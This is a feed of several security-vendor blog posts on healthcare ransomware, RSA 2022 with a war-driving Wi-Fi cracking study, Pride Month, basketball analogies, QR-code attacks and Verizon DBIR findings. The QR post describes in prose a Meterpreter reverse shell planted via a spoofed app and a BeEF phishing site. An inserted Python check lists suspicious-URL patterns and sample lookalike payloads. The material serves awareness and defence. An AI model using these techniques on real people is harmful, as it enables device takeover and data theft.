For more insights, tune in to the full episode, “Why Technology is Key to Restoring Trust in Healthcare with Mike Towers,” or listen wherever you get your podcasts.

Editor’s note: Responses have been edited for length and clarity with permission.

]]>
What’s Missing in Healthcare Ransomware and Supply Chain Defense https://www.cyberark.com/blog/whats-missing-in-healthcare-ransomware-and-supply-chain-defense/ Wed, 22 Jun 2022 13:00:50 +0000 https://www.cyberark.com/?p=132094 Healthcare Ransomware and Supply Chain Defense

The omnipresent ransomware threat is changing how healthcare organizations approach cybersecurity — from formalizing practices in an effort to obtain cyber insurance coverage to improving their ability to restore encrypted data after attacks. But as cyber attackers lean heavily on third-party vendors and suppliers to extort ransoms, remaining gaps across healthcare security frameworks are coming into focus, including a lack of Identity Security controls for securing and managing privileged accounts and third-party access.

Healthcare is Ransomware Attackers’ No. 1 Target

The average healthcare organization faced two or more ransomware attacks over the past year, found the CyberArk 2022 Identity Security Threat Landscape Report — and according to the FBI, healthcare is still the most targeted industry. While ransomware is far from new to the sector, attacks continue to grow in sophistication and scale.

Figure: healthcare ransomware timeline. Examples of recent ransomware attacks on healthcare organizations

Taking a Broader View Across the Healthcare Supply Chain

In the healthcare field, it’s common to view ransomware and other cyber threats as they relate to the electronic health record (EHR). Lisa Pino, director of the Office for Civil Rights (OCR) at the U.S. Department of Health & Human Services (HHS), recently urged covered entities and business associates to expand their thinking and approaches, writing in an HHS blog post, “Risk management strategies need to be comprehensive in scope … from software, to connected devices, legacy systems, and elsewhere across your network.”

Part of this expanded approach involves better assessing and managing cybersecurity risks associated with third-party vendors across vast healthcare supply chains. To that end, the Cloud Security Alliance (CSA) recently published agnostic guidance to help healthcare delivery organizations (HDOs) overcome pervasive challenges associated with third-party vendor evaluations and cyber risk management. In the new paper “Healthcare Supply Chain Cybersecurity Risk Management,” CSA authors outline several best practices, including:

1. Systematically inventory all third-party vendors and suppliers. Evaluations must include both direct suppliers and suppliers of suppliers, as well as non-traditional connected systems and IoT devices — all of which have information system components that could introduce cybersecurity risk, such as providing remote, third-party privileged access to critical internal resources. Report authors note that any cloud-based application or service provided must also be evaluated — including those purchased with a credit card outside of IT’s or finance’s formal procurement and approval processes.

2. Tier suppliers based on risk, using a third-party risk rating service if possible. Part two of this inventory process is categorizing vendors based on mission priority or impact to the organization, as well as level of risk. For any third-party vendor utilizing cloud services (essentially every organization today), assessments should evaluate cloud security practices across each stage of the cloud data lifecycle: create, store, use, share, archive and destroy. CSA authors offer an initial framework to follow, while encouraging organizations to also reference ISO, NIST, HITRUST and other industry standards. They note that using third-party risk rating services and qualified vendor lists can be helpful in achieving more consistent ratings.

3. Identify and define key risk areas. Privilege escalation is the No. 1 attack vector of risk for healthcare organizations today. Using stolen credentials, attackers can begin moving through systems looking for opportunities to escalate privileges and exploit powerful privileged accounts to install ransomware. Despite this reality, many healthcare organizations and their suppliers fall short in securing and monitoring privileged accounts as they focus on HIPAA-specific safeguards for securing ePHI.

4. Provide supply chain vendors with risk-prioritized action plans — and make following them a mandatory part of doing business. Extending critical Identity Security practices to include privileged access management should top healthcare organizations’ action list. Doing so can help protect against ransomware and dramatically drive down risk across the supply chain by enhancing visibility and control over privileged accounts, isolating and monitoring privileged activity, removing direct access to tier 0 systems, and minimizing credential exposure and privilege escalation opportunities.

Secure the Care Continuum With Identity Security

Properly prioritizing privileged access management as a part of a comprehensive Identity Security program can help “ensure that resources are deployed first to issues that matter most,” strengthening cyber resilience across the care continuum to improve outcomes for all.

]]>
RSA 2022, Wi-Fi Cracking Across San Francisco and How It All Comes Down to Trust https://www.cyberark.com/blog/rsa-2022-wi-fi-cracking-across-san-francisco-and-how-it-all-comes-down-to-trust/ Fri, 17 Jun 2022 13:00:25 +0000 https://www.cyberark.com/?p=132010

Trust – how to build it, how to strengthen it and how to restore it – was a major theme at RSA Conference 2022.

Members of our CyberArk team joined 26,000 attendees online and in San Francisco as the Moscone Center once again opened its doors for the 31st annual cybersecurity conference. Reunited in person at last, there was much ground to cover. Yet every hard-hitting issue ultimately came down to trust. That same week, our CyberArk Labs team set out to explore a possible link between trust and consumer cybersecurity behaviors – but more on that in a minute. First, here are some key trust takeaways from RSA.

Trust Takeaways from RSA Conference 2022

Society’s ever-increasing reliance on technology continues to push digital advancements further and faster. Each new day brings another 2.5 quintillion bytes of data and equally as many new opportunities for cyber attacks that can expose sensitive data, breach confidentiality and damage reputations and bottom lines.

“We are more vulnerable because of the dizzying pace we are adopting technology, engaging in tech transformation and adding devices without prioritizing security,” noted Niloofar Razi Howe, an RSA keynote moderator and senior operating partner at Energy Impact Partners. This pattern of “innovate now, secure later” not only drives up cybersecurity debt and puts organizations at greater risk, but it also contributes to a broader cycle of public distrust.

Consumers are more skeptical than ever about how their sensitive financial, genetic, health and location data are used, and privacy concerns continue to grow with every headline-grabbing cyber attack. As U.S. Cybersecurity and Infrastructure Security Agency (CISA) director Jen Easterly noted in the “Cybersecurity as a National Security Imperative” panel, “Building trust is hard, and breaking trust is easy.” During the keynote “Building Trust in a Zero-Trust World to Confront Tomorrow’s Cyber Threats,” Howe pointed to the 2022 Edelman Trust Barometer, a global study of more than 36,000 people that found nearly six in every 10 respondents said “distrust” is now their default state.

Diminishing consumer trust is also fueled heavily by information disorder – the topic of the final keynote, featuring former CISA director Chris Krebs, Color of Change President Rashad Robinson and journalist Katie Couric. As the “slope of discord” seemingly grows steeper by the day, the panel sounded the alarm on how malicious cyber actors can use disinformation and misinformation to their advantage, emphasizing the need to ensure “truth actually has a fighting chance,” to quote Robinson.

The previously mentioned Edelman study shows that people have particularly high expectations of businesses in breaking this cycle of distrust. Numerous speakers throughout the week urged that meeting these expectations – while preserving trust across highly interconnected IT environments and supply chains – means businesses must transform to stay ahead of cyber threats.

Technology plays a big part in these transformation efforts. For instance, Jane Horvath, chief privacy officer at Apple, spoke of privacy-enhancing technologies that focus on data not tied to individual identities, while advancements in telemetry, automation and AI were widely touted as critical to combating ransomware at scale. But don’t confuse technology with broader security approaches, cautioned speakers, including national cyber director Chris Inglis, who made a point of defining Zero Trust as a “digital architecture comprised of technology, of people and practice doctrine.”

Even with the best frameworks and defense-in-depth technology layers in place, businesses can’t shoulder the burden of trust on their own. In her RSA talks and in an op-ed published the same week, Easterly stressed that “cybersecurity requires a whole-of-government and whole-of-society effort.”

Could Trust Impact Consumer Cybersecurity Behaviors?

CyberArk Labs cracked Wi-Fi networks across San Francisco to find out.

Our CyberArk Labs team wanted to better understand if overarching trust issues have influenced consumers’ home Wi-Fi cybersecurity practices. With hybrid work models here for good, unsecured home networks pose serious risks as threat actors target them to steal bandwidth, launch man-in-the-middle (MitM) and other attacks and even pivot into corporate networks.

So while the world talked security at the RSA Conference, our own CyberArk Labs technical evangelist Andy Thompson took to the hilly streets of San Francisco. The plan was this: “war-drive” around densely populated areas to test wireless network resiliency in the U.S. tech capital.

Historically, cracking Wi-Fi passwords is a time-intensive process requiring threat actors (and threat researchers) to intercept a four-way “handshake” as a network connection is established in real time. But thanks to the work of a researcher known as “atom,” there’s a much easier way to pinpoint weak passwords – and it can be done at any time. This PMKID hash harvesting method simply requires the person to be in the vicinity of a home or business router. (Explore all the technical specifics on the CyberArk Threat Research Blog.) Behind the wheel of a rental car, armed with simple, readily available Wi-Fi sniffing equipment – a laptop running Linux and a $50 wireless network interface card – Thompson set out to replicate similar experiments conducted by CyberArk Labs in Tel Aviv and Dallas, Texas.

Figure 1. Readily available Wi-Fi sniffing equipment

Twenty hours and countless cups of coffee later, Thompson had collected 5,000 Wi-Fi network hashes, which were sent through CyberArk Labs’ monster brute-force cracking rig (8 x QUADRO RTX 8000 48GB GPUs) that can guess commonly used and weak passwords in seconds or less. It’s important to note that at no point were actual passwords captured or used during this research project.

And the results? Just 6% of the sniffed Wi-Fi networks were crackable in the San Francisco Bay area, compared to 9% in Dallas and a whopping 70% in Tel Aviv. This makes San Francisco the most secure city in our war-driving journey to date and perhaps signals a broader shift in consumer cybersecurity habits and heightened awareness around data protection responsibilities.

Figure 2. Wi-Fi cracking through the hills of San Francisco

Protect Your Wi-Fi Network This World Wi-Fi Day (and Every Day)

With World Wi-Fi Day on June 20, we encourage every online user to consider how they secure this household technology – especially now that it’s used so interchangeably for personal and work life. Because passive Wi-Fi sniffing leaves no trace on the network, it cannot be detected, and safeguards such as two-factor authentication won’t stop it. Instead, it’s important to follow these steps to protect yourself and your employer from Wi-Fi cracking attempts:

  • Change the default username and password of your router if you haven’t already
  • Update your router firmware and always keep patches up to date
  • Upgrade to the WPA3 encryption protocol to help strengthen protections against brute force password cracking attempts
  • And most important, use strong passwords that are complex, unique and changed (or rotated) frequently

Protecting our digital identities is a shared responsibility. To echo Director Easterly, every one of us – as individuals, organizations and government entities – must put and keep our “shields up” to strengthen collective defense and trust.

Trust … it’s something we’re talking about a lot these days. Listen to the Trust Issues podcast on Spotify, Apple Podcasts, Amazon Podcasts and Google Podcasts – or wherever you get your podcasts.

]]>
Celebrating Our LGBTQIA2S++ Community With Pride https://www.cyberark.com/blog/celebrating-our-lgbtqia2s-community-with-pride/ Fri, 10 Jun 2022 15:58:31 +0000 https://www.cyberark.com/?p=131832 Celebrating Our LGBTQIA2S++ Community With Pride

This Pride Month, we celebrate the diverse identities and tremendous contributions of LGBTQIA2S++ people around the world and within our CyberArk community. But nurturing an inclusive, supportive workplace isn’t something that ends on June 30 — it must be woven into every experience and interaction all year round. Sharing their perspectives are Ani King, CyberArk enterprise support manager, premium; Brian Nienhouse, CyberArk Privilege Cloud team lead; and Sam Emmitt, CyberArk support engineer, premium.

These three CyberArk diversity, equity and inclusion (DEI) champions have played instrumental roles in establishing our CYBR Pride employee resource group (ERG) and are helping to grow this global community of LGBTQIA2S++ and ally members. Our conversation centers on findings from a recent CYBR Pride survey that highlighted members’ specific areas of interest and collective learning opportunities.

Respondents indicated that having a dedicated LGBTQIA2S++ community network at work best supports “a safe space to share experiences” and “promotion of diversity.” As founding members of CYBR Pride, why is this initiative important to you?

“Visible support is critical at work,” says King. “An ERG signals to people that they can have expectations for support, instead of just wondering.” They emphasize the need for established practices that help ensure every individual feels safe and supported in the workplace. “Without official policy, visible support and budget for meaningful change, changes are likely to be cobbled together or led in silos by specific managers or teams — which means they aren’t guaranteed if someone moves to another department, location, or even from day to day,” King continues.

Adds Nienhouse, “When leadership is invested in an ERG like CYBR Pride, it sends a message to the company that we are truly valued and celebrated, increasing the sense of community and belonging — the top driver of employee engagement, according to industry research.”

Many survey respondents identifying as allies said they want to do more to show their support. What advice can you share about ways to show allyship in the office and in the community?

Here, King, Nienhouse and Emmitt offer several helpful suggestions, which are summarized below:

  • Do some research. Our panel suggests visiting the Human Rights Campaign, PFLAG, the Transgender Law Center and The Okra Project. And for additional reading, consider NPR’s list of books to celebrate Pride Month and this glossary of helpful acronyms.
  • Use people’s pronouns. Using inclusive language consistently is a small thing that adds up to a big thing in support of our shared humanity.
  • Share your own pronouns during meeting introductions and in your email signature to help normalize a culture of inclusive communication and respect for all.
  • Make a visible statement. Place a decal or magnet on your laptop, office door or car to indicate your allyship.
  • Help educate others. Educating others on why LGBTQIA2S++ people matter can be a lot to shoulder. When allies make it a point to help share that load by verbally and visibly supporting them and educating others, it helps.
  • Be receptive to feedback. Consider and value the lived experiences of your LGBTQIA2S++ colleagues — accept feedback and ask for ways you can improve and show up as an ally.
  • Support LGBTQIA2S++ businesses during Pride Month and throughout the year. If there is a local LGBTQ community center or support center nearby, please support it. Funding is always an issue for these organizations, and they may be the only lifeline available to people in your area.
  • Don’t worry about messing up. Becoming a strong advocate for the community takes time. If you get a pronoun wrong, don’t sweat it, just correct yourself. Or, if someone corrects you, thank them and plan to do better next time.

Transgender awareness was a particular area of interest for our survey respondents. What are some ways colleagues can deepen their understanding and show their support?

“Make sure the person transitioning is being called by their preferred name,” says Emmitt. “Managers can help by communicating exactly when a team member’s new names or pronouns should be used to help eliminate confusion and mistakes.” Also look for opportunities to check in and be there for your co-worker, they continue. “There may be new activities they’ve been afraid to do alone, like shopping for new clothes. See if having someone there with them could help reduce that anxiety.”

Another way to demonstrate allyship is to initiate conversations about how you’ve unlearned negative thoughts or behaviors, notes Nienhouse. “Conversations that come from a place of genuine care tend to be most effective.” They offer this example: “Hey, I saw you were a little nervous around Sam after you learned he is trans. I had a hard time knowing what to do with that information too, but all that’s important is that you and Sam respect each other. You don’t have to know or understand everything about that part of his identity.”

Here, Nienhouse shares from personal experience. “I transitioned on the job at CyberArk and felt nothing but support and encouragement from my manager and team. Everyone responded positively and immediately switched up my pronouns. I was always treated with dignity and respect, and my experience as a transitioning employee made me feel seen and appreciated.”

Small day-to-day interactions also provide opportunities to reinforce support for LGBTQIA2S++ colleagues — and they go a long way, notes King.

“From my first interview to present, my boss has been consistent about using my pronouns in every conversation. Knowing that I’m supported without question makes a difference in how I feel about work in general,” says King.

Research shows that a company’s ability to compete for talent is directly linked to its DEI focus. For members of the LGBTQIA2S++ community seeking new job opportunities of any kind, what questions should they be asking of potential employers?

Our panel offers the following suggested questions to ask:

  • Are you aware of any visibly out people in the company? And how does the company support them in their gender and identity presentation?
  • How does your company plan to support transitioning individuals in the future, should that be a need?
  • How do you visibly show support for your employees at a company level?
  • Do you have an ERG in place, and if not, is one in progress?
  • How do you visibly show support for people outside of the company, so that prospective employees are aware that it may be a safe place for them to work?
  • Are employee benefits inclusive of LGBTQIA2S++ employees’ needs, and do they cover things such as gender confirmation procedures?

Closing Thoughts

“Progress is often marked by big, visible events throughout history and celebrated during prominent events such as Pride Month. But it’s important to remember that behind every monumental moment, there are things we can all do by the minute, hour and day to drive meaningful change,” says King.

“And if you’re wondering if it’s too late to get involved, please know that it’s never too late,” encourages Emmitt.
What the 2022 NBA Finals Teaches Us About All-Star Cybersecurity https://www.cyberark.com/blog/what-the-2022-nba-finals-teaches-us-about-all-star-cybersecurity/ Tue, 07 Jun 2022 13:00:07 +0000 https://www.cyberark.com/?p=131750 What the 2022 NBA Finals Teaches Us About All-Star Cybersecurity

It’s NBA Finals time in the United States, and our global CyberArk team — from our die-hard Boston Celtics and Golden State Warriors fans to our threat-researchers-by-day, ballers-by-night in Israel — is here for it. With Game 3 set to tip off on the Boston parquet Wednesday night, here’s a look at how the cross-country battle between the Celtics and the Warriors is feeling a lot like the war being waged on the identity battleground in cyberspace:

Long-range attacks are changing the game. The Golden State Warriors’ long-range shooters have revolutionized the game of basketball — no one more so than Steph Curry, who consistently makes “unearthly shots” from up to 30 feet away. Cyber attackers are also mastering a similar long-range approach to infiltrate organizations from afar — far beyond network walls. Intelligent identity security controls such as single sign-on (SSO) and multi-factor authentication (MFA) for remote workers and privileged access controls for external vendors are key to blocking these audacious long-range attempts.

Not every shot can (or should) be a three-pointer. Many baskets come on good shot selection. And often, scoring requires multiple passes, with the Celtics’ Jayson Tatum showing us how it’s done. But on the flipside, every pass is an opportunity for the other team. Looking for ways to limit this lateral movement — down the court or deeper into an IT environment — can limit offensive opportunities.

Protecting in the paint is the “heart” of your enterprise. Elite defense around the rim is one of the ways good teams become great. By defending the most important thing (on the court and in the enterprise, respectively), the Celtics’ Robert Williams III and privileged access management (PAM) have our vote for Defensive Players of the Year.

Don’t discount under-the-radar risks. One of the best parts about basketball — especially during the late-round playoffs and into the finals — is that teams constantly evolve, meaning anything can happen. Cybersecurity teams can’t just defend against attacks they’ve already seen or underestimate Payton Pritchard-type threats that could have the X factor that swings the whole series.

Defense (in depth) wins championships. The Athletic’s Jared Weiss writes, “The Celtics made the NBA Finals not because they could stop everything from happening by switching up on every play, but because it was able to invite the opponent into what was supposed to be a comfort zone.” In basketball and in cybersecurity, teams need a solid, layered defense with multiple players working together in unison to detect and respond to threats, close up gaps and sometimes even lull attackers into a false sense of security before turning up the heat.

Planning for turnovers is part of the playbook. Team playbooks outline detailed plans that players follow to help keep the ball in their possession. But these playbooks also account for less-than-ideal scenarios — and outline plays for when things go sideways. By proactively assuming breach — and testing their plays routinely — cybersecurity teams will be better equipped to regain possession, minimize damage and restore trust quickly after an incident.

Dream teams are made up of players with diverse yet complementary skills. You need the Michael Jordans and Magic Johnsons, of course, but you also need the Draymond Greens and Derrick Whites — players willing to put in the work, roll up their sleeves and get the job done, whether that means passing, rebounding, defending or scoring. Same goes for cybersecurity teams: Diverse skillsets and backgrounds make them stronger and more effective. And as the cybersecurity skills gap continues to widen, investing in an organizational dream team’s collective growth, well-being and success must be a priority.

And finally… unlike basketball, cybersecurity is a game that never ends. It requires extreme endurance, a powerful toolset and an endless supply of grit and ingenuity, just like basketball. Setbacks cannot distract from the mission or the road ahead. In the words of Klay Thompson after the Warriors’ Game 1 defeat last week, “It’s the first to four, not the first to one. We all have been through hard situations like this … and the best part about this is we have another opportunity.”
Step Away From the QR Code and Read These 7 Safety Tips https://www.cyberark.com/blog/step-away-from-the-qr-code-and-read-these-7-safety-tips/ Thu, 02 Jun 2022 11:00:00 +0000 https://www.cyberark.com/?p=131535 QR Code Cyber Safety

This post is authored by Len Noe, a technical evangelist and white hat hacker at CyberArk. You can listen to his “Trust Issues” podcast episode on QR codes here and his episode on transhumanism and charting the final cybersecurity frontier here.

If it seems like there’s a QR code on everything these days, you’re right.

In the contactless era, these little black and white grids emerged from relative obscurity to replace everything from restaurant menus to store coupons to subway station ads. They’ve become the de facto business card, digital event leave-behind and virtual payment option. Governments around the world have even embraced them to facilitate contact tracing and vaccination status verification.

QR codes are accessible, easy to produce and, seemingly, here to stay. They’re also a perfect way for cyber criminals to snag your personal information. Here’s what you need to know before scanning that code with your smartphone.

What is a QR Code?

Short for quick response codes, QR codes are a type of two-dimensional barcode that contain data, often for a locator, identifier or tracker. They can be easily read by a smartphone or other camera-equipped device and converted into useful information for the end-user, such as a URL for a website or an application. QR codes were first invented in 1994 by an automotive company to track car components, but their ease of use and greater storage capacity — up to 2,500 characters compared to a barcode’s 43 — soon made them popular in other industries. But it wasn’t until after COVID-19 struck that QR codes really took hold, particularly in the United States where they were historically viewed as a novelty. Then all of a sudden, they were everywhere.

Before we go further, it’s important to note that QR codes can be used for numerous reasons and in numerous ways. Today, the most prevalent consumer use case is for marketing: QR codes found in advertisements, on business cards or on restaurant tables, as examples. When scanned, these QR codes are meant to redirect a person to a URL containing information about a product, a person applying for a job, a digital dinner menu, etc. My research and this accompanying blog post focus exclusively on these types of “URL redirect” QR codes. While I don’t cover them here, QR codes can also be used for more sophisticated purposes, for instance, as tokens or factors in a multifactor authentication flow. Because token QR codes are linked to a specific, corresponding technology and only work on registered devices, they are harmless to scan and virtually useless from an attacker perspective.

3 Attack Simulations on Rising QR Code Risks

More than two years of pandemic-fueled cyber crime has made many consumers more cautious about their digital activity. Emails, calls and even texts are scrutinized closely, forcing many attackers to step up their phishing games. And yet, QR codes haven’t really registered as potentially dangerous, and most people still scan them without a second thought.

Case in point: In January 2022, the FBI issued a warning that cyber attackers were tampering with legitimate QR codes to redirect victims to malicious sites that steal login and financial information. Within weeks of the warning, during the biggest football game of the year, more than 20 million people scanned a single mysterious QR code in a commercial for an unnamed company in the span of one minute.

I’m here to tell you that is bad news, and show why through three attack simulations:

QR Code Attack Vector 1: Job Seekers and Form Fillers Everywhere, Beware

To start, I created a fake paper ad for an imaginary job fair, just like the ones seen on job boards in your local coffee shop.

Figure 1: Fake job fair ad containing malicious QR code 

It contains the event details and a legitimate-looking QR code that takes the user to a job finder site where they can get a head start on submitting their job application.

Figure 2: QR code leads to a false careers page

Filling out the required personal information is quick and easy… except, it can all go straight to an attacker’s webmail.

Figure 3: Job applicant’s personal data delivered to cyber attacker’s email inbox

Think of all the times you’ve filled out a form or survey online — whether it originated from a QR code, social media ad or elsewhere. It’s very hard to know where your data is headed to on the back end. So proceed with great caution.

QR Code Attack Vector 2: Vax Pass or Phone Takeover?

For an attacker, “ultimate access” is the ability to interact directly with your device. This can be done via a reverse shell attack, or “connect-back shell,” which takes advantage of the target system’s vulnerabilities to initiate a shell session and gain access to the victim’s device. In this attack example, I used the Metasploit Meterpreter shell to spoof the COVID Certificate application used abroad.

By scanning a QR code, the victim goes to what appears to be the Google Play Store and installs the app. Except it’s not Google Play…

Figure 4: Spoofed COVID Certificate app 

After the user initiates the install, the attacker now has a reverse connection into the device.

Figure 5: Attacker establishes reverse connection 

With this type of initial access, the attacker could potentially set up persistence and then come and go as they please to do anything from dumping call and SMS logs to taking pictures with the camera. In other words, anything you can do on your phone, they could do too.

Creepy? Absolutely. Easy for an attacker to execute? Also yes.

QR Code Attack Vector 3: The QR Code Phishing Attack You Never Saw Coming

When you sit down at a restaurant and see a QR code on the table, chances are you’ll scan it without a second thought, expecting it to take you to the menu. But what if that same QR code was embedded in an email coming from someone you don’t know? Would you be as quick to scan it — or would it give you pause?

Attackers are betting you won’t be as careful. And too often, they’re right. Here’s a side-by-side comparison of two QR codes. Can you tell the difference?

Figure 6: Two QR codes

One will take you to a restaurant website’s menu, the other will take you somewhere else entirely. As I’ve done here, attackers can clone a legitimate login QR code and turn it into a phishing website that looks almost identical to the real one — except that the URL is different.

Figure 7:  Fake menu and phishing website

When the victim scans the QR code, they are redirected to the attacker’s web server, where a malicious website running the BeEF (Browser Exploitation Framework) suite is waiting, giving the attacker control of the victim’s device. The attacker now has access to multiple attack vectors and numerous ways to exfiltrate the user’s data, such as their current GPS location, device type, SIM card data and other sensitive information.

With some additional social engineering tricks, the attacker could take things even further. By using on-device spear-phishing, they could spoof the victim’s on-device password keeper. After the victim inputs their username and password, the attacker could gain access to the user’s full password safe. Game over.

Figure 8: Spoofed on-device password keeper requests victim’s username and password

QR Code Attacks are Increasing. Here are 7 Ways to Protect Yourself

Last fall, the private key used to sign the European Union’s Green Pass vaccine passports was reportedly leaked or forged. Within days, fake QR code-laden passes signed with the stolen key were up for sale on the Dark Web. In China, scammers have been caught placing fake parking tickets — complete with QR codes for easy mobile fine payment — on parked cars. In the Netherlands, a QR code scam exploited a legitimate feature within a mobile banking application to swindle the bank’s customers, while in Germany, phony emails containing QR codes have lured eBanking customers to malicious websites under the guise of reviewing privacy policy updates to their accounts. And in Texas, criminals hit the streets, pasting stickers of malicious QR codes onto city parking meters and tricking residents into entering credit card details into a fake phishing site.

QR code attacks are happening everywhere with alarming frequency. Here are seven ways to protect yourself:

1. Don’t scan it! If anything feels off, don’t scan the QR code. Just go to the actual website directly. Any legitimate QR code should have an associated URL under it, giving users the option to navigate there directly. If it’s missing, beware.

2. Slow down. Before you scan any QR code, ask yourself: Do I know who put the QR code there? Do I trust that it hasn’t been tampered with? Does it even make sense to use a QR code in this situation?

3. Inspect QR code URLs closely. After scanning the QR code, check out the URL it directs you to before proceeding. Does it match the organization associated with the QR code? Does it seem suspicious, or include strange misspellings or typos? For instance, in the Texas parking meter scams, part of the URL used was “passportlab.xyz” — clearly not an official city government website. You can also do a quick web search of the URL to confirm that the QR code is legitimate.

4. Look for signs of physical tampering. This is especially important in places where QR codes are commonly used, such as restaurants. If you spot a QR code sticker adhered to a page over another code, be very skeptical.

5. Never download apps from QR codes. Bad actors can clone and spoof websites easily. Always go to the official app market for your device’s OS and download your apps from there.

6. Don’t make electronic payments via QR codes. Use the native app or direct a browser to the official domain and log in there.

7. Turn on multi-factor authentication (MFA). This will help protect your sensitive accounts, such as banking, email and social media apps. With another authentication layer in place, a cyber criminal cannot access your data with just your login and password.
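To make tip 3 concrete, here is an added defensive check (example code, not part of the original post) that runs on the text a scanner app decodes from a QR code before the link is opened: it flags non-HTTPS links, a host outside the organization’s expected domain, one- or two-character lookalikes, userinfo tricks, bare IP hosts, link shorteners and throwaway TLDs. The expected domains, the shortener and TLD lists and the sample payloads are constructed assumptions.

```python
"""Added example: a defensive URL check applied to a decoded QR payload.
Not code from the original post; domain lists and samples are constructed."""
import ipaddress
import re
from urllib.parse import urlsplit

# Link shorteners hide the real destination; a menu or payment link rarely
# needs one, so treat them as a reason to stop (constructed, not exhaustive).
SHORTENERS = {"bit.ly", "tinyurl.com", "t.co", "goo.gl", "is.gd", "cutt.ly"}
# Cheap TLDs common in scams; the Texas parking-meter scam in the post used
# a ".xyz" domain (constructed list, not exhaustive).
SUSPICIOUS_TLDS = {"xyz", "top", "club", "icu", "buzz", "work"}


def _edit_distance(a: str, b: str) -> int:
    """Levenshtein distance, used to catch one- or two-character lookalikes."""
    prev = list(range(len(b) + 1))
    for i, ca in enumerate(a, 1):
        cur = [i]
        for j, cb in enumerate(b, 1):
            cur.append(min(prev[j] + 1, cur[j - 1] + 1, prev[j - 1] + (ca != cb)))
        prev = cur
    return prev[-1]


def _registrable(host: str) -> str:
    """Last two labels as a stand-in for the registrable domain.
    A production check would consult the Public Suffix List instead."""
    labels = host.split(".")
    return ".".join(labels[-2:]) if len(labels) >= 2 else host


def assess_qr_url(payload: str, expected_domain: str) -> dict:
    """Return {'verdict': 'ok'|'caution'|'block', 'reasons': [...]} for a
    decoded QR payload that should lead to expected_domain (or a subdomain)."""
    reasons = []
    if not re.match(r"https?://", payload, re.IGNORECASE):
        # tel:, sms:, wifi: and plain-text payloads are outside the URL-redirect
        # case this post covers; hand them to a human rather than act on them.
        return {"verdict": "caution", "reasons": ["payload is not an http(s) URL"]}
    parts = urlsplit(payload)
    host = (parts.hostname or "").lower().rstrip(".")
    expected = expected_domain.lower()
    if parts.scheme.lower() != "https":
        reasons.append("not HTTPS")
    if parts.username is not None:
        # https://bistro-menu.example@evil.test/ shows a trusted name before '@'
        # while the browser actually connects to evil.test.
        reasons.append("URL contains userinfo before '@'")
    try:
        ipaddress.ip_address(host)
        reasons.append("host is a bare IP address")
    except ValueError:
        pass
    reg = _registrable(host)
    if reg in SHORTENERS:
        reasons.append(f"link shortener {reg} hides the destination")
    elif host != expected and not host.endswith("." + expected):
        reasons.append(f"host {host!r} is not under expected domain {expected!r}")
        exp_name, got_name = expected.split(".")[0], reg.split(".")[0]
        if got_name != exp_name and _edit_distance(got_name, exp_name) <= 2:
            reasons.append(f"{got_name!r} looks like a typo of {exp_name!r}")
        tld = reg.rsplit(".", 1)[-1]
        if tld in SUSPICIOUS_TLDS:
            reasons.append(f"suspicious TLD .{tld}")
    if not reasons:
        verdict = "ok"
    elif reasons == ["not HTTPS"]:
        verdict = "caution"  # right site, but the link can be altered in transit
    else:
        verdict = "block"
    return {"verdict": verdict, "reasons": reasons}


# Constructed sample payloads, as a QR scanner app would decode them.
SAMPLES = {
    "restaurant": ("https://menu.bistro-menu.example/today", "bistro-menu.example"),
    "lookalike": ("https://bistr0-menu.example/today", "bistro-menu.example"),
    "parking": ("https://passportlab.xyz/pay", "parking.example"),
    "userinfo": ("https://bistro-menu.example@evil.test/", "bistro-menu.example"),
}

if __name__ == "__main__":
    for name, (url, expected) in SAMPLES.items():
        print(name, assess_qr_url(url, expected))
```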

When it comes to QR codes, the best piece of advice is to always use common sense. If it was an email, would you click on it? QR codes are becoming one of attackers’ favorite phishing methods — and the same rules apply. Proceed with caution and apply the same security scrutiny as you would with anything in the digital realm.

Scan safe out there — or better yet, don’t scan at all!

To learn more, register for our live August 16, 2022 webinar, “QR Codes in a Post-Pandemic World.”
2022 Verizon DBIR: 15 Years, 15 Takeaways https://www.cyberark.com/blog/2022-verizon-dbir-15-years-15-takeaways/ Wed, 01 Jun 2022 13:00:45 +0000 https://www.cyberark.com/?p=131526 2022 Verizon DBIR: 15 Years, 15 Takeaways

Since 2008, the Verizon Data Breach Investigations Report (DBIR) has provided the global cybersecurity community with valuable insights on the evolving threat landscape. Not only does the latest 2022 report dig deep into current trends, it also looks back over 15 years to show just how much has changed… and how some things, like identity compromise through credential theft, never do.

To commemorate 15 years, here are 15 takeaways and observations on the 2022 Verizon DBIR:

1. When it comes to credential theft, it’s Groundhog Day all over again. The use of stolen credentials was pervasive across the 23,896 security incidents and 5,212 confirmed breaches analyzed, and the first link in nearly 50% of attack chains. It’s a familiar story on repeat: As the 2009 DBIR noted years ago, “It is evident that many intrusions exploit the basic (mis)management of identity.”

2. And things only got worse from there. Since its 2017 analysis, the DBIR team has tracked an almost 30% increase in the use of stolen credentials. Today, credentials represent “one of the most tried-and-true methods to gain access to an organization” and are “the favorite data type of criminal actors because they are so useful for masquerading as legitimate users on the system,” noted the 2022 DBIR.

3. One thing that has changed dramatically is ransomware, which surged by 13% to 25% in one year — more than the past five years combined. Ransomware was present in almost 70% of all malware-related breaches, was one of the top tactics used by “capable threat actors” in system intrusions and supply chain attacks, and does not discriminate based on organization size.

4. Forty percent of all ransomware incidents involve desktop sharing software. With people working from everywhere, attackers found desktop sharing software such as remote desktop protocol (RDP) to be particularly useful — especially in launching ransomware attacks. Desktop sharing software was linked to 14% of all system intrusion incidents. “Unfortunately, if you can access the asset directly over the internet simply by entering the credentials, so can the criminals,” noted DBIR authors.

5. BUT… “Ransomware alone is simply a model of monetization of a compromised organization’s access that has become quite popular,” reminded the report authors. Reversing the ransomware rampage mostly comes down to blocking the most common paths to an organization’s estate, beginning with credential theft at the endpoint.

6. This year’s DBIR found 62% of system intrusion incidents came through an organization’s partner. In supply chain breaches, which the DBIR team classifies as a “sequence of one or more breaches chained together,” the use of stolen credentials was identified as a top action variety. Noted the DBIR team in its report announcement, “Compromising the right partner is a force multiplier for cyber criminals, and highlights the difficulties that many organizations face in securing their supply chain.” The findings corroborate those of the CyberArk 2022 Identity Security Threat Landscape Report, which found that 64% of security leaders admit an attack on their organization originating from a compromised software supplier could not be stopped.

